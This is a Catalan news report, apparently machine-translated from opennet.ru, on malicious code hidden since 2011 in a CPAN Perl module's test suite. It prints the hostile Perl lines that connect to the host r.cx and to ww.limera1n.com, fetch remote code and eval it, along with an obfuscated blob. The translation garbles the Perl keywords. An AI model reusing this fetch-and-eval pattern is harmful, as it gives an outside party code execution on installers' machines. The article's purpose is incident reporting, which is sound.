En un paquet Perl distribuït a través del directori CPAN , dissenyat per carregar automàticament mòduls CPAN sobre la marxa, codi maliciós. La inserció maliciosa era al codi de prova , que s'envia des del 2011.
Cal destacar que van sorgir preguntes sobre la càrrega de codi qüestionable torna el 2016.
L'activitat maliciosa es redueix a un intent de baixar i executar codi des d'un servidor de tercers (http://r.cx:1/) durant l'execució d'una suite de proves llançada en instal·lar el mòdul. Se suposa que el codi descarregat inicialment del servidor extern no era maliciós, però ara la sol·licitud es redirigeix al domini ww.limera1n.com, que proporciona la seva part del codi per a l'execució.
Per organitzar la descàrrega en un fitxer S'utilitza el codi següent:
el meu $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
el meu $try = `$^X $prog`;
El codi especificat fa que l'script s'executi , el contingut del qual es redueix a la línia:
utilitzeu lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Aquest script es carrega utilitzant el servei codi de l'amfitrió extern r.cx (els codis de caràcters 82.46.99.88 corresponen al text "R.cX") i l'executa al bloc d'eval.
$ perl -MIO::Socket -e'$b=nou IO::Socket::INET 82.46.99.88.":1″; imprimir <$b>;'
eval desempaquetar u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Després de desembalar, finalment s'executa el següent: :
imprimir{$b=nou IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
El paquet problemàtic ara s'ha eliminat del repositori. (Perl Authors Upload Server) i el compte de l'autor del mòdul està bloquejat. En aquest cas, el mòdul encara es manté a l'arxiu MetaCPAN i es pot instal·lar directament des de MetaCPAN mitjançant algunes utilitats com cpanminus. que el paquet no es va distribuir àmpliament.
Interessant de discutir i l'autor del mòdul, que va negar la informació que es va inserir codi maliciós després que el seu lloc "r.cx" fos piratejat i va explicar que només s'estava divertint i va utilitzar perlobfuscator.com no per ocultar alguna cosa, sinó per reduir-ne la mida. del codi i simplificant-ne la còpia a través del porta-retalls. L'elecció del nom de la funció "botstrap" s'explica pel fet que aquesta paraula "sona com bot i és més curta que bootstrap". L'autor del mòdul també va assegurar que les manipulacions identificades no realitzen accions malicioses, sinó que només demostren la càrrega i l'execució de codi mitjançant TCP.
Font: opennet.ru
